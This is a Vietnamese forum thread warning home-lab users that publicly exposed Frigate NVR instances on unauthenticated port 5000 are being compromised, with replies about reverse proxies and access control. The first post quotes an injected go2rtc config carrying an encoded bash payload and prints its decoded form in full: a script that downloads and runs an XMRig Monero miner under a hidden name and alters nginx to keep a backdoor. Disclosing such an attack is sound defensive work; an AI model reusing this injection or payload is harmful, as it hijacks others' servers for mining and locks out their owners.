Minimalist Forum Reader

thảo luận Cảnh báo anh em sử dụng Frigate đang public ra internet

Trang 1/1
RutoVi RutoVi
#1
TLDR: Ai đang mở port 5000 của Frigate ra internet thì upgrade lên 0.17 beta 2 liền.

Nhớ để ý, đừng public bất kì cái gì ra internet, tất cả đều có thể scan được. Trong lúc Trư đi dạo internet để làm việc linh tinh 8-) thì phát hiện cácinstance Frigate ở Việt Nam đang mở port open (5000) thay cho port 8971 (có auth) sẽ bị chèn một đoạn mã vào để exec.

Ví dụ:
Code: 
mqtt:
  host: 192.168.0.111
  topic_prefix: frigate
  client_id: frigate
  user: xxx
  password: xxx
  stats_interval: 60
go2rtc:
  streams:
    Aqara: rtsp://xxx
    debug: exec:/bin/bash -c 'base64
      -d<<<H4sIAAAAAAACA81Y+3MatxP/2fdXbG8YY9oRxwG2wQz5Dn40NK6T1PbUk8R1Ruh0oHIvn3SY+NG/vSvdQQ6bjJNM2/niwdZj97MP7a5WHpweDPuVrSyiIQcS1qy3b9782ujboYh4nbWSOA7qLA7tnvX6zeHRGZIGEogHjvwkHY/PBONSjxUPnSj2uPn1IzRf6E0nyoIA7uGGAQlqPet8eHo0OESMLahsjVOeAGFwlaQxgsg4BUcPHZZkIvLjVYx74GwSg1sDB5pQQ7Dhm9eDkyMEMxsLvNAFO0QVAtAW2auQPZjEUumNGmoVetsyC3HAMoWKuKSDqB/ArhhLbVSZQwP+gM1NyG13e3C83y8knfBwMKMioCMky6WEPDSK34NK0UcMqg3SrRpQcou4x/t2DocojR6c7BtPHO+jSW6j2dZWwenRb2bVSAR0ZKvRMOZqxU4QgIw5jpCswDpBwr5PpdI+uoMymcZBwsJjJfIJDfwePPSsg8KFue+OwL767Lv7qxM9fuTChbs8qO5VgfgIfQ+S41Q6V+A4VZxmkbhGja1h36Y+6za93S4d7dJmk9J2x+vwFhrbabSb/u6I0Rbz8W/Xp7ts1NrudrY7jLvuaJd1utTzbeti0Lfbuwd8u/XKH57MJ7e8yc73D6ZR96U7Gg0PL94Pf393/Po9Y/R4qtJWc/T+9/SAvRqPfzs4+/ldNp0exWfdwxl9F96KltuavLqd/tl92Xn7/vC8Pd8Zjs+6GNwDDHlC0EaSpCJOhfrUbwEhXhxRxTEQZjzou7igJimnnuxX7vJY3iPNB1xOaeTF4Zxo7+GedvIeCcR4ovTulPOEBmLG0RojJ0sDqNyZTHvYc7fxg1QsFhGEccTTGGeZ5CnSXAw0QEKlxEke8XvkNRI92GBduE/Ami38fB9Y8wlYu62hlE747wFsPQFsFdp9L+Tg9OVZ364MGlC50F8Xv038aswRZdNxGmeRp/lTESmiRMj7Ow2cB/GY+CLgfUeFiVNXKWW8jou2ZQ3envdtptWkiSKZEqgbC+mUwygTgUewMvFICRpAIEbZzCVYk/RQymAxnNwEMdMTG9GO+7YGwdOPsnmBMaKSF6AGxDDGCY8WIEsEMGxkgkHGU4nqnQzOzo9O+/ZEqUTuOc5YqEk20iXZmYepGBe/acomGGBOyn3paG7phFgTeFpXNK2Pb21r3tn5uNN+FijlAUdtsbbHN1EQU8+Z7dSb2/VGvk/ySW4dkYoqwch8p70UYx3+cooFxcdq7gGer8PiyBdjcOJEOeO4mSoGDldsMf7LqecUxUIPvBiLGNYXu+IVJc4UeDPFyQgTcKqpIo7lsqisKLSgzcUnN17Nsm4meOSQ5MVtjuc7hRewvFOMJBlgbsJ2jveYwRzYN3HoEBpz9QyTpTiW6x+AYIyjvkU8au3vrA1jbFUXYEyIGeZEp25+qhpUOy7lMg5mxmuwhtytmx8kf0pvWRtGNJZts0WDBK95Upx5ocCG9lOWeFj4MHOimDDKJrxYp55XWoQKxjuYwLA2Hh6je3wkaPQRlZIijj6j5y5aSPgE5Poa7/pNF2+O3I8zsPOYyFK8WMIsUCJBL+t0lja82GyWYESEQYgNQoFjdCvW0C6M7pBHntSKnn+jEK2wSjOu79VLlLj1WHOsKFjxhZQiGmvidSr9c+rUtIc3rA19wQ+wabOhD3ae1EXoa++aQkbkr1DJt4DEYGqeOaQiS003NRcKXOQIp57AbiUpkRnLKS7Ob/013OSgTEuwCqQiwWoeJhjckZJ4UZbivzCzJDEN14CWOcrErKxYIbKcNF/gezDdEPIvUs0rw8iULRy21v4vKVNyb16Xn3fvxr/oyG/zpM7PddY65o76ItvCgf4TFucE66O+VZe+dDKZOiMROfldR85W7Nv/eqFG1yVaDiZX/VUgkD8rW5FuUGuPfPU14ZSb8fVBpfOPTbDJg5/mX8OQTAUu5CQW2mQlEm4WKW9/cP7I2e1lFbjG5Da9kq1hVtit4pLxwXYWbI/E3uF98MKYl/Jr3d5YOkJIWhzd57bnH78HnulqCtf9394Oz3d236yCjuByhFR07wqbxYVtV8zLCyr5K8IG1zAVbYJ2xrKlsBeHvWyEzjKm38tQydvjnHlDx9cyiByaiKLzciSd6XewTiY0hgZONBbR3Ozql938U95KYPxs6XccEVB1BQgftioYRhme2ccsFfDXj2tgaxhzKVdZGkG70cInZfV5QWiH2dAZjRGHLWatpHgper+ktBk+VVreU+OXj8ia54VUXoxv1ZCKqLeyWRJS7Fafl7VOb8u6swA/eRu4p/s7M9efAfahigoMPhef8CsyV/87khsfv4Xq5f9opib9y+MPV3in/6Tf0gVCbQmLHW+kW4Di0tftwFYRUwNdSOSENrd3Sv/Y8KqgH+puzXQMleGyW4DSZ+FE51Kf8WVxyJfmlB3vu051if+oJq2INQG/01iry38chUsdHpaj9YrnSru50qahf9i0/gbZiiaKSBMAAA==|zcat|sh'
  log: {}
cameras:
  Aqara:
    enabled: true
    ffmpeg:
      inputs:
        - path:
...
Click to expand...

Decode bas64 ra thì là một con miner

Code: 
❯ echo "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" | base64 -d | zcat
ARCH=$(uname -m)
POOL0="mine.c3pool.com";
NODES=$(ls -d /sys/devices/system/node/node* 2>/dev/null | wc -l);
THREAD=$(( $(grep -c ^processor /proc/cpuinfo 2>/dev/null || echo 1) / 2 ));
HONAME=$(echo $(grep -m1 "model name" /proc/cpuinfo; hostname) | md5sum | cut -c1-8);
[ "$NODES" -le 0 ] && NODES=1; KB=$(grep MemAvailable /proc/meminfo | tr -dc '0-9');
[ -z "$KB" ] && KB=0; MB=$(( KB / 1024 )); REQ=$(( NODES * 2300 ));
[ "$MB" -ge "$REQ" ] && MODE=fast || { [ "$MB" -ge $(( REQ / 2 )) ] && MODE=half; };
CNAME=$(grep -E "^model name|^Model" /proc/cpuinfo | cut -d ':' -f 2 | sed 's/^ //' | uniq);

H="afc92d79ab7a22aa48d8e30248042f7bca3cff7b9fa7cb359858ce11b7c89adf"
WA="47Ce53JfHMxhze2cTBCkn9G1bbHDWZHVYKNZccaKktr32bZVrCcJggQCSFYukkEoS9DvaYmzi313hJzkj9G8PZDT4x6HgS9";
A0="--cpu-priority=3 --donate-level=1 --threads=${THREAD:-2} --randomx-mode=${MODE:-light} --keepalive"
W0="--url ${POOL0}:15555 --coin monero --user ${WA} --pass ${HONAME:-None}"
W1="--url ${POOL0}:23333 --coin monero --user ${WA} --pass ${HONAME:-None}"
W2="--url ${POOL0}:443 --tls --coin monero --user ${WA} --pass ${HONAME:-None}"
W3="--url ${POOL0}:33333 --tls --coin monero --user ${WA} --pass ${HONAME:-None}"
ARGS="$A0 $W0 $W1 $W2 $W3 --background --print-time=60 --log-file=/tmp/.trace.log"

APT="curl apt-utils cmake build-essential libuv1-dev libssl-dev libhwloc-dev"
APK="util-linux build-base cmake libuv-dev openssl-dev hwloc-dev linux-headers"

MASTER="https://github.com/xmrig/xmrig/archive/refs/heads/master.tar.gz"
x86_64="https://github.com/xmrig/xmrig/releases/download/v6.25.0/xmrig-6.25.0-linux-static-x64.tar.gz"

DIR=$(for d in /config /opt/go2rtc /etc/go2rtc ~/.config/go2rtc; do [ -d "$d" ] && echo "$d" && break; done); [ -z "$DIR" ] && DIR=$(pwd)

while pgrep -x apk > /dev/null; do sleep 5; done
while pgrep -x make > /dev/null; do sleep 5; done
while pgrep -x apt-get > /dev/null; do sleep 5; done

test ! -s $DIR/.trace && {
    echo 'nameserver 8.8.8.8' > /etc/resolv.conf
    echo 'nameserver 1.1.1.1' >> /etc/resolv.conf

    test -f /etc/alpine-release && {
        apk update --no-cache
        apk add --no-cache $APK xmrig
    }

    test -f /etc/debian_version && {
        apt-get update -y -qq 2>&1 | grep -v "configured multiple times" >&2
        apt-get install -y -qq --no-install-recommends $APT 2>&1 | grep -v "configured multiple times" >&2 && true || \
        (apt-get update --fix-missing && apt-get install -y --no-install-recommends $APT 2>&1 | grep -v "configured multiple times" >&2)
    }

    [ "$ARCH" = "x86_64" ] && {
        curl -sL $x86_64 -o /tmp/xmrig.tar.gz || exit 1
        mkdir -p /tmp/xmrig && tar -xzf /tmp/xmrig.tar.gz -C /tmp/xmrig --strip-components=1 > /dev/null 2>&1 || exit 1
        rm /tmp/xmrig.tar.gz > /dev/null || exit 1
        cp /tmp/xmrig/xmrig $DIR/.trace > /dev/null || exit 1
    } || {
        test ! -d /tmp/xmrig/src && {
            mkdir -p /tmp/xmrig > /dev/null || exit 1
            curl -sL $MASTER -o /tmp/xmrig.tar.gz || exit 1
            tar -xzf /tmp/xmrig.tar.gz -C /tmp/xmrig --strip-components=1 > /dev/null 2>&1 || exit 1
            rm /tmp/xmrig.tar.gz > /dev/null || exit 1
        }

        mkdir -p /tmp/xmrig/build > /dev/null || exit 1
        test ! -f /tmp/xmrig/build/Makefile && {
            /usr/bin/cmake -S /tmp/xmrig -B /tmp/xmrig/build > /dev/null || exit 1
        }

        /usr/bin/make -s -C /tmp/xmrig/build -j$(nproc) > /dev/null 2>/dev/null || exit 1
        cp /tmp/xmrig/build/xmrig $DIR/.trace > /dev/null || exit 1
    }

    chmod +x $DIR/.trace > /dev/null || exit 1
    pkill trace
}


ps w | grep "[/].trace" | grep -q "$POOL0" || pkill trace

pgrep -f "/.trace" > /dev/null || {
    >/tmp/req.log
    rm -rf /tmp/.trace.log

    test -f /etc/alpine-release && {
        apk update --no-cache
        apk add --no-cache libuv-dev openssl-dev hwloc-dev
    }

    test -f /etc/debian_version && {
        apt-get update -y -qq 2>&1 | grep -v "configured multiple times" >&2
        apt-get install -y -qq --no-install-recommends libuv1-dev libssl-dev libhwloc-dev 2>&1 | grep -v "configured multiple times" >&2
    }

    $DIR/.trace $ARGS &
    echo "$CNAME $THREAD" 1>&2
    sleep 5 && pgrep -x ".trace" && echo "Success $HONAME" 1>&2
}

grep -q "/api/config/save" /usr/local/nginx/conf/proxy.conf || (sed -i '1i if ($request_uri ~* "/api/config/save") { return 403; }' /usr/local/nginx/conf/proxy.conf && nginx -s reload)
grep -q "/tmp/req.log" /usr/local/nginx/conf/nginx.conf || (sed -i 's|access_log /dev/stdout main;|access_log /tmp/req.log main;|' /usr/local/nginx/conf/nginx.conf && nginx -s reload)


{
    while :; do
        A=$(tail -100 /tmp/req.log 2>/dev/null | grep -oP '\?auth=\K[^" ]+' | tail -1)
        [ -n "$A" ] && [ "$(echo "$A" | sha256sum | cut -d' ' -f1)" = "$H" ] && {
            sed -i '/\/api\/config\/save/d' /usr/local/nginx/conf/proxy.conf && nginx -s reload
            >/tmp/req.log
            sleep 60
            sed -i '1i if ($request_uri ~* "/api/config/save") { return 403; }' /usr/local/nginx/conf/proxy.conf && nginx -s reload
        }
        >/tmp/req.log
        sleep 10
    done
}&
Click to expand...

Fixed ở 0.17 beta 2: https://github.com/blakeblackshear/frigate/discussions/21593
Reactions: anhyeuviolet, Storm Spirit <3, NNV_dst and 2 others
ppptran ppptran
#2
Mở mỗi 443 có sao ko thím ?

Sau 443 là traefik đứng trỏ.....
RutoVi RutoVi
#3
ppptran said:
Mở mỗi 443 có sao ko thím ?

Sau 443 là traefik đứng trỏ.....
Click to expand...
443 trỏ vào 8971 cũng được, trỏ vào 5000 cũng tạch. Trừ khi chỗ Traefik đó có auth gì đó.
ppptran ppptran
#4
RutoVi said:
443 trỏ vào 8971 cũng được, trỏ vào 5000 cũng tạch. Trừ khi chỗ Traefik đó có auth gì đó.
Click to expand...
Traefik dash thì whitelist theo ip cho nó chớ thím.......

Còn trỏ về dest thì cứ thêm cái token cho traefik authen cũa url đó.

Mà thôi. Block hết. Tailsclae về cho đỡ sợ......
Reactions: Nightcall
nambanker nambanker
#5
có cách nào bỏ hẵn id admin (thay bằng tên khác) khi đăng nhập k nhỉ ?
mình add được id khác nhưng k bỏ id admin được.
ninhpham.au ninhpham.au
#6
nambanker said:
có cách nào bỏ hẵn id admin (thay bằng tên khác) khi đăng nhập k nhỉ ?
mình add được id khác nhưng k bỏ id admin được.
Click to expand...
Không dùng frigate nên không biết, nhưng mà HomeLab mà.

Không biết chỗ thì chỉnh SQLite frigate.db bằng tay luôn (aka. dùng sqlite3 hay chương trình đọc ghi SQLite, chứ không phải notepad nha). Gì phải xoắn.
Reactions: nambanker